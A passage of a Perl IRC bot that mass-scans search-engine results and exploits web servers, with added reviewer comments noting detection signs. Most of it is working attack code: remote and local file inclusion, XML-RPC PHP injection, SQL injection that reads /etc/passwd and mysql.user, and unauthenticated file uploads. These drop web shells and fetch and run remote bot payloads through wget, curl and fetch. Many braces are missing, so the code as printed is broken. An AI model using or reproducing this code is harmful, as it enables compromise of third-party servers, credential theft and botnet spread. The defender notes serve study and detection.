else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"ALtaViSTa",$type);

} exit; }

if ($engine =~ /ask/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"AsK",$type);

} exit; }

if ($engine =~ /uol/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"UoL",$type);

} exit; }
}

if ($engine =~ /yahoo/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"YahOo",$type);

} exit; }

if ($engine =~ /clusty/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"CluSty",$type);

} exit; }

if ($engine =~ /gutser/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {


&type($chan,$bug,$dork,"GutSer",$type);

} exit; }

if ($engine =~ /rediff/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"ReDiff",$type);

} exit; }

if ($engine =~ /virgilio/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"VirgiLio",$type);

} exit; }

if ($engine =~ /webde/i) {

if ($pid = fork) { waitpid($pid, 0); }


else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"WebDe",$type);

} exit; }

if ($engine =~ /exalead/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"ExaLead",$type);

} exit; }

if ($engine =~ /lycos/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"LyCos",$type);

} exit; }

if ($engine =~ /hotbot/i) {
if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"HotBot",$type);

} exit; }

if ($engine =~ /aol/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"AoL",$type);

} exit; }

if ($engine =~ /sapo/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"SaPo",$type);

} exit; }

}
if ($engine =~ /duck/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"DuCk",$type);

} exit; }

if ($engine =~ /lygo/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"LyGo",$type);

} exit; }

if ($engine =~ /yause/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"YauSe",$type);

} exit; }
}

if ($engine =~ /baidu/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"BaiDu",$type);

} exit; }

if ($engine =~ /kipot/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"KiPoT",$type);

} exit; }

if ($engine =~ /gibla/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"GiBLa",$type);
} exit; }

if ($engine =~ /black/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"BLacK",$type);

} exit; }

if ($engine =~ /onet/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"oNeT",$type);

} exit; }

if ($engine =~ /sizuka/i) {

if ($pid = fork) { waitpid($pid, 0); }


else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"SiZuka",$type);

} exit; }

if ($engine =~ /walla/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"WaLLa",$type);

} exit; }

if ($engine =~ /demos/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"DeMos",$type);

} exit; }

if ($engine =~ /rose/i) {
if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"RoSe",$type);

} exit; }

if ($engine =~ /seznam/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"SeZnaM",$type);

} exit; }

if ($engine =~ /tiscali/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"TisCali",$type);

} exit; }

}
if ($engine =~ /naver/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"NaVeR",$type);

} exit; }

#########################################

# rfi($chan, $bug, $dork, $engine): remote-file-inclusion scan over the hosts
# returned by search_engine() (defined outside this listing).
# For each host it sends a probe request plus two requests that embed the
# $botshell URLs. When the probe response contains PHP's "failed to open
# stream" warning, it forks and calls rfi_xpl().
# Defensive reading: the check depends on the target echoing PHP warnings.
# Turning display_errors off removes that signal, and allow_url_include=Off
# stops a remote URL from being included at all.
# NOTE(review): some closing braces are missing from this listing.
sub rfi() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);

my $num = scalar(@list);

if ($num > 0) {
foreach my $site (@list) {

$count++;

# "Scan finish" is announced on the second-to-last host.
if ($count == $num-1) { &msg("$chan","$rfilogo(#4@#9$engine#15)#10 Scan finish"); }

# Request URLs: host + vulnerable path + included value + "??". The "??"
# suffix appears on every request, which makes it a log signature.
my $coba = "http://".$site.$bug."test??";

my $test = "http://".$site.$bug.$injector."??";

my $dor = "http://".$site.$bug.$botshell."??";

my $dor2 = "http://".$site.$bug.$botshell2."??";

# Three requests per host, one second apart.
my $cek = &get_content($coba);sleep(1);

&get_content($dor);sleep(1);

&get_content($dor2);sleep(1);

if ($cek =~ /failed to open stream/i) {

# Double fork: the grandchild does the work, detached from the caller.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

&rfi_xpl($test,$chan,$site);

exit;}

}
# rfi_xpl($url, $chan, $site): request $url with the payload URLs appended and
# report to the channel, and to $admin on a confirmed hit.
# A hit is recognised by the marker text "JANCOK- exploit" in the response.
# That marker and the scraped field labels ("Software :", "SAFE MODE is",
# "OS :", "Freespace :") describe the web-shell page the operators use, so
# they are useful strings when hunting for it on a compromised server.
# NOTE(review): the brace closing the `if` before `else` and the sub's final
# brace are missing from this listing.
sub rfi_xpl() {

my $url = $_[0];

my $chan = $_[1];

my $site = $_[2];

my $dor = $url.$botshell."??";

my $dor2 = $url.$botshell2."??";

my $test = $url.$injector."??";

# Display form of the hit, tagged with the crew name.
my $vuln = $url."#14(ByroeNet)";

my $check = &get_content($test);

&get_content($dor);sleep(1);

&get_content($dor2);sleep(1);

if ( $check =~ /JANCOK- exploit/i ) {

my $safe ="";

my $os ="";

my $free ="";

# Scrape host details from the shell page. $soft is an undeclared global and
# is not used again in this sub.
if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}

if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}

&msg("$chan","$rfilogo(#4@#9VuLn#15)#13 ".$vuln."#9(#4@#15SafeMode= $safe#9)


(#4@#15OS= $os#9)(#4@#15FreeSpace= $free#9)(#4@#9safemode-off#15)");

&msg("$admin","$rfilogo(#4@#9VuLn#15)#13 ".$vuln."#9(#4@#15SafeMode= $safe#9)


(#4@#15OS= $os#9)(#4@#15FreeSpace= $free#9)");

else {&msg("$chan","$rfilogo(#4@#9VuLn#15)#10 ".$vuln."


(#4@#7safemode-on#15)#");}

sub lfi() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$lfilogo(#4@#9$engine#15)#10 Scan


finish"); }

my $dir = "../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";

my $vuln = "http://".$site."#12".$bug.$dir."/proc/self/environ%0000";

my $shell = "http://".$site."#12".$bug.$dir."/tmp/ipays%0000";

my $html = &get_content($test);

if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork)


{ exit; } else {

my $code = 'echo
"c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.
$injector.'","/tmp/ipays")) { echo "SUCCESS";@copy("'.
$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';

my $res = lfi_env_query($test,encode_base64($code));

&lfi_spread_query($test);

&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);

&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");

$res =~ s/\n//g;

if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {

my $sys = $1;

$nob0dy = $2;

&msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 ".$shell." #15(#4@#9".


$sys."#15))#15(#4@#9$nob0dy#15)#");sleep(2);

elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {


if (my $pid = fork) { waitpid($pid, 0); } else { if (fork)
{ exit; } else {

my $sys = $1;

$nob0dy = $2;

my $upload = 'system("killall -9 perl;killall -9


php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg
aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg
byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg
allnet.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O
aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O
byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O
allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");';

my $wget = lfi_env_query($test,encode_base64($upload));
sleep(2);

my $check = &get_content("http://".$site.$bug.
$dir."/tmp/ipays%0000"); sleep(2);

&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);

&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);

if ($check =~ /JANCOK- exploit/) {

&msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 ".$shell." #15(#4@#3".


$sys."#15)#15(#4@#9$nob0dy#15)#");sleep(2);

&msg("$admin","$lfilogo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 ".$shell."
#15(#4@#3".$sys."#15)#15(#4@#9$nob0dy#15)#");sleep(2);

else {

&msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9SysTem#15)#7 ".$vuln." #15(#4@#3".


$sys."#15))#15(#4@#9$nob0dy#15)#");sleep(2);
}

} exit; }

else
{ &msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9EnviRon#15)#10 ".$vuln); }

} exit; } sleep(2);

# lfi_env_query(url, code): send one GET to `url` whose User-Agent header is a
# PHP snippet wrapping `code` in eval(base64_decode(...)), and return the
# response body. The visible callers pass `code` already base64-encoded.
# Defender note: the payload travels in the User-Agent header, so an access
# log that records user agents will show a value beginning with
# "<?eval(base64_decode(". Alerting on (or rejecting) user agents that contain
# a PHP open tag is a cheap detection for this request. The caller only
# proceeds when the page echoes DOCUMENT_ROOT= and HTTP_USER_AGENT, i.e. when
# request headers are reflected through a file-inclusion path.
sub lfi_env_query() {

my $url = $_[0];

my $code = $_[1];

# The "agent" value is sent as the User-Agent request header.
my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");

# Give up on the request after 7 seconds.
$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);

# Body is returned whatever the HTTP status was; no error check is made here.
return $res->content;

}
# lfi_spread_query(url): same delivery channel as lfi_env_query (PHP in the
# User-Agent header), but with a fixed payload. The payload is a PHP system()
# call that, in /tmp and then /var/tmp, tries fetch, wget, curl -O and
# lwp-download in turn to retrieve $botshell and $botshell2, runs each
# downloaded .jpg with the php CLI, and deletes the files afterwards.
# Defender note: the host-side artefacts are a web-server-owned process
# spawning fetch/wget/curl/lwp-download, and `php <name>.jpg` executed from
# /tmp or /var/tmp. Egress filtering for the web server account and a noexec
# mount on temp directories both interrupt this step.
# NOTE(review): the closing brace of this sub is missing in this listing; the
# next `sub` starts directly after the last statement.
sub lfi_spread_query() {

my $url = $_[0];

# $botshell / $botshell2 are file-level variables set at the top of the script.
my $code = "system('cd /tmp;rm -rf allnet.* *.jpg.*;fetch ".$botshell.";php


byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl
-O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php
byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".
$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php
allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd
/var/tmp;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php
byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf
byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php
allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf
allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".
$botshell2.";php allnet.jpg;rm -rf *.jp*;');";

# The payload is base64-encoded here and wrapped in eval(base64_decode(...)).
my $ua = LWP::UserAgent->new(agent => "<?


eval(base64_decode('".encode_base64($code)."'));?>");

$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

# The response is stored but never read in the visible lines.
my $res = $ua->request($req);

# xml(chan, bug, dork, engine): for every host returned by search_engine(),
# request "http://<host><bug>" and, when the body contains "faultCode",
# hand the URL to xml_cek_query / xml_spread_query in a detached child.
# Results are reported to the IRC channel through &msg.
# Defender note: the sequence visible to a target is a plain GET of the
# endpoint, then text/xml POSTs from user agent "perl post", then GETs for
# aspaltx.php, byroe.php and allnet.php at the site root.
# NOTE(review): several closing braces are missing in this listing, so the
# exact nesting of the loop and conditionals cannot be confirmed from here.
sub xml() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

# "Scan finish" is announced when the counter reaches num-1, i.e. one
# iteration before the last host.
if ($count == $num-1) { &msg("$chan","$xmllogo(#4@#8$engine#15)#10 Scan


finish"); }

my $test = "http://".$site.$bug;

# $vuln is the display form of the URL used in channel messages.
my $vuln = "http://".$site."#13".$bug;

my $html = &get_content($test);

# "faultCode" in the body is used as the sign that an XML-RPC endpoint answered.
if ($html =~ /faultCode/ ) {

# Parent waits for the first child; that child forks again and exits, so the
# work below runs in a grandchild that the parent does not wait on.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; }


else {

my $resp = &xml_cek_query($test);

# The probe wraps its command output between two "j13mb0t" markers.
if ($resp =~ /j13mb0t(.*)j13mb0t/s) {

&xml_spread_query($test);sleep(2);

my $sys = $1;

# Only the first response is inspected; the other two requests are made for
# their side effect of touching the dropped files.
my $check = &get_content("http://".$site."aspaltx.php");

&get_content("http://".$site."byroe.php");

&get_content("http://".$site."allnet.php");

if ($check =~ /JANCOK- exploit/) {


&msg("$chan","$xmllogo(#4@#8$engine#15)#15(#13@#9SheLL#15)#13 http://".
$site."#7aspaltx.php #3".$sys);&get_content("http://".$site."byroe.php");
sleep(2);}

else {

&msg("$chan","$xmllogo(#4@#8$engine#15)#15(#4@#9SysTem#15)#7 ".$vuln." #3".$sys);


sleep(2);}

sleep(2); } exit; } }

# xml_cek_query(url): POST a text/xml <methodCall> to `url` whose <name>
# value breaks out of a quoted argument ("',''));") and appends PHP that
# echoes the marker "j13mb0t", runs `uname -a`, echoes the marker again and
# exits. Returns the response body so the caller can look for the markers.
# Defender note: the request is identifiable by user agent "perl post",
# Content-Type text/xml, and a <name> element containing "',''));" followed
# by PHP statements. An XML-RPC library that evaluates element content as
# code is the precondition; patched libraries treat it as data.
# NOTE(review): $exploit is not declared with `my` here, so it is a package
# variable shared with xml_spread_query. The closing brace of this sub is
# missing in this listing.
sub xml_cek_query() {

my $url = $_[0];

my $code = "system('uname -a');";

my $ua = LWP::UserAgent->new(agent => 'perl post');

$exploit = "<?xml version=\"1.0\"?><methodCall>";

$exploit .= "<methodName>test.method</methodName>";

$exploit .= "<params><param><value><name>',''));";

# Markers on both sides let the caller cut the command output out of the page.
$exploit .= "echo'j13mb0t';".
$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";

$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);

return $res->content;

# xml_spread_query(url): same XML-RPC <methodCall> delivery as xml_cek_query,
# with a larger payload. The embedded system() call downloads $injector,
# $botshell and $botshell2 into the current directory and renames them to
# aspaltx.php, byroe.php and allnet.php, kills all perl and php processes,
# then in /tmp and /var/tmp downloads the two bot files with
# fetch/wget/curl/lwp-download and runs each with the php CLI.
# Defender note: look for newly created aspaltx.php / byroe.php / allnet.php
# in the web root, `killall -9 perl` / `killall -9 php` issued by the web
# server account, and php executing .jpg files from temp directories.
# The response is not inspected; the caller checks for the dropped files.
sub xml_spread_query() {

my $xmltargt = $_[0];

my $xmlsprd = "system('wget ".$injector." -O aspaltx.php;fetch ".$injector.";mv


ipays.jpg aspaltx.php;wget ".$botshell." -O byroe.php;fetch ".$botshell.";mv
byroe.jpg byroe.php;wget ".$botshell2." -O allnet.php;fetch ".$botshell2.";mv
allnet.jpg allnet.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.*
*.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php
byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf
byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php
allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf
allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".
$botshell2.";php allnet.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".
$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf
byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".
$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf
allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".
$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php
allnet.jpg;');";

my $userAgent = LWP::UserAgent->new(agent => 'perl post');

# $exploit is a package variable (no `my`), the same one xml_cek_query writes.
$exploit = "<?xml version=\"1.0\"?><methodCall>";

$exploit .= "<methodName>test.method</methodName>";

$exploit .= "<params><param><value><name>',''));";

$exploit .= "echo'j13m';".
$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";

$userAgent->timeout(7);

$userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content =>


$exploit);
}

# sql(chan, bug, dork, engine): for every host from search_engine(), request
# "http://<host><bug>'" (the parameter with a single quote appended) and
# classify the response by database error text. MySQL-style errors are passed
# to sqlbrute(); MS SQL and Access/Oracle-driver errors are only reported to
# the channel.
# Defender note: this test depends entirely on verbose database errors being
# returned to the client. Parameterised queries remove the flaw; generic error
# pages remove the fingerprint this check keys on. In logs it appears as a
# request whose parameter value ends in a lone "'".
# NOTE(review): closing braces for the loop and the outer `if` are missing in
# this listing.
sub sql() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

# Announced at num-1, one iteration before the last host.
if ($count == $num-1) { &msg("$chan","$sqllogo(#4@#8$engine#15)#10 Scan


finish"); }

# $test carries the trailing quote; $sqlsite is the same URL without it.
my $test = "http://".$site.$bug."'";

my $vuln = "http://".$site."#4".$bug;

my $sqlsite = "http://".$site.$bug;

my $html = &get_content($test);

# Parent waits for the first child, which forks and exits; the grandchild
# does the classification below.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ m/You have an error in your SQL syntax/i || $html =~


m/Query failed/i || $html =~ m/SQL query failed/i ) {

&sqlbrute($sqlsite,$chan,$engine);}

elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed


quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9MsSQL#15)#13 ".
$vuln);}

elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft


Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9MsAccess#15)#13 ".
$vuln);}

elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html


=~ m/mysql_fetch_array/i ) {

&sqlbrute($sqlsite,$chan,$engine);}

# The sleep after `exit` on the next line can never run.
} exit; sleep(2); }

# sqlbrute(situs, chan, engine): append UNION SELECT probes to the URL in
# `situs`, growing the column list up to 20 entries, and look for the marker
# "loginpwnz" in the response (0x6c6f67696e70776e7a is that string in hex).
# When the marker is reflected it goes on to probe information_schema.tables,
# mysql.user, load_file() of 0x2f6574632f706173737764 (hex for /etc/passwd,
# confirmed by the /root:x:/ check), and finally each name in @tabele, calling
# tabelka() for the tables that answer. Every hit is reported through &msg.
# Defender note: these requests are easy to spot in access logs: the parameter
# value starts with "-1+union+select+" and contains long hex literals,
# "information_schema.tables", "mysql.user" or "load_file(". Besides fixing
# the injection with bound parameters, a database account without the FILE
# privilege and without read access to the mysql schema makes the later
# probes fail.
# NOTE(review): the braces of the for/if/else/while/foreach bodies are missing
# in this listing, so the nesting below cannot be reconstructed with
# certainty. $column, $union, $inyection, $sql, $response, $loadcont,
# $loadfile and $tabla are not declared with `my` and are therefore package
# variables; @tabele is defined outside this excerpt.
sub sqlbrute() {

my $situs=$_[0];

my $chan =$_[1];

my $engine=$_[2];

# Upper bound on the number of columns tried.
my $columns=20;

# "--" terminates the injected statement; "+" stands for a space in the URL.
my $cfin.="--";
my $cmn.= "+";

for ($column = 0 ; $column < $columns ; $column ++)

$union.=','.$column;

$inyection.=','."0x6c6f67696e70776e7a";

if ($column == 0)

$inyection = '';

$union = '';

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cfin;

# `get` is presumably LWP::Simple::get (the file imports LWP::Simple).
$response=get($sql);

if($response =~ /loginpwnz/)

$column ++;

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)#13 $sql #");

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;

# `or die` ends the current process when the request returns a false value.
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");


if($response =~ /loginpwnz/)

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".
$cmn."information_schema.tables".$cfin;

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13INFO_SCHEMA#15)#13
$sql #");

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."mysql.user".$cfin;

$response=get($sql)or die("[-] Impossible to get MySQL.User\n");

if($response =~ /loginpwnz/)

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".
$cmn."mysql.user".$cfin;

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13USER#15)#13 $sql #");

else

# Pads the load_file() probe to the column count found above.
while ($loadcont < $column-1)

$loadfile.=','.'load_file(0x2f6574632f706173737764)';

$loadcont++;
}

$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;

$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");

# "root:x:" is the start of a typical passwd entry, used as the success check.
if($response =~ /root:x:/)

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13Load File#15)#13 $sql


#");

else

foreach $tabla(@tabele)

chomp($tabla);

$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;

$response=get($sql)or die("[-] Impossible to get tables\n");

if($response =~ /loginpwnz/)

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.
$cmn."from".$cmn.$tabla.$cfin;
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13Tabel#15)#13 $sql
#");

&tabelka($situs,$tabla,$chan,$engine);

# tabelka(situs, tabla, chan, engine): for each column name in @kolumny,
# request a UNION SELECT of concat(marker, ':', <column>) from table `tabla`
# and report the URL/table/column to the channel when the "loginpwnz" marker
# comes back in the response.
# Defender note: the request pattern is "union+select+concat(0x6c6f...,0x3a,"
# in a parameter value; the same bound-parameter fix that stops sqlbrute()
# stops this.
# NOTE(review): @kolumny is defined outside this excerpt. $inyection, $sql,
# $response and $columna are package variables here; $inyection is presumably
# the column padding left behind by sqlbrute() - confirm. The braces of the
# foreach/if bodies and the closing brace of the sub are missing in this
# listing.
sub tabelka() {

my $situs =$_[0];

my $tabla =$_[1];

my $chan =$_[2];

my $engine=$_[3];

my $cfin.="--";

my $cmn.= "+";

chomp($tabla);

foreach $columna(@kolumny)

chomp($columna);
$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.
$tabla.$cfin;

# A false return from get() ends the current process.
$response=get($sql)or die("[-] Impossible to get columns\n");

if ($response =~ /loginpwnz/)

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13SQLi Vuln#15)#9
$situs #14(#4@#13Kolom#14)#13 $columna #14(#4@#13Tabel#14)#13 $tabla #");

# osco(chan, bug, dork, engine): for every host from search_engine(), request
# "http://<host><bug>" and, when the body contains
# "Warning: No file uploaded", call osco_xpl() on that URL from a detached
# child process.
# Defender note: the trigger string means an upload handler answered a GET
# from a client that sent no credentials. Upload scripts under an admin path
# should refuse such requests before reaching the upload logic.
# NOTE(review): closing braces for the loop and outer `if` are missing in this
# listing. The line "$test);" below is the wrapped tail of the commented-out
# &msg call above it and is live code as printed here.
sub osco() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);

my $num = scalar(@list);

if ($num > 0) {
foreach my $site (@list) {

$count++;

# Announced at num-1, one iteration before the last host.
if ($count == $num-1) { &msg("$chan","$oscologo(#4@#8$engine#15)#10


Scan finish"); }

my $test = "http://".$site.$bug;

my $html = &get_content($test);

# Parent waits for the first child, which forks and exits; the grandchild
# runs the check below.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ /Warning: No file uploaded/ ) {

# &msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9System#15)#7 ".
$test);

&osco_xpl($test,$chan,$site,$engine);

} else { }

# The sleep after `exit` can never run.
} exit; sleep(2); }

# osco_xpl(url, chan, site, engine): send four multipart form POSTs to `url`,
# each uploading a local file (./ipays.jpg, ./maza.jpg, ./byroe.jpg,
# ./allnet.jpg) in the "products_image" field under a different remote name
# (bronsx.php, aspaltx.php, byroe.php, allnet.html). It then requests the
# uploaded names under "<site>images/" and, if the first response contains
# "JANCOK- exploit", parses a few fields from that page and reports to the
# channel and to $admin.
# Defender note: no cookies or credentials are set on the user agent, so the
# upload only works where the handler accepts anonymous requests. Refusing
# executable extensions on upload and disabling script execution in the
# images/ directory both break the follow-up requests. New .php/.html files
# appearing in images/ are the on-disk indicator.
# NOTE(review): $soft is assigned without `my`; the four as_string results are
# never read; closing braces of the `if` and of the sub are missing in this
# listing.
sub osco_xpl() {

my $browser = LWP::UserAgent->new;

my $url = $_[0];

my $chan = $_[1];
my $site = $_[2];

my $engine = $_[3];

# [ local path => remote filename => content type ] form-upload triples.
my $res = $browser->post( $url,['products_image' => ['./ipays.jpg' => 'bronsx.php'


=> 'application/octet-stream']],'Content-Type' => 'form-data');

my $resa = $browser->post( $url,['products_image' => ['./maza.jpg' => 'aspaltx.php'


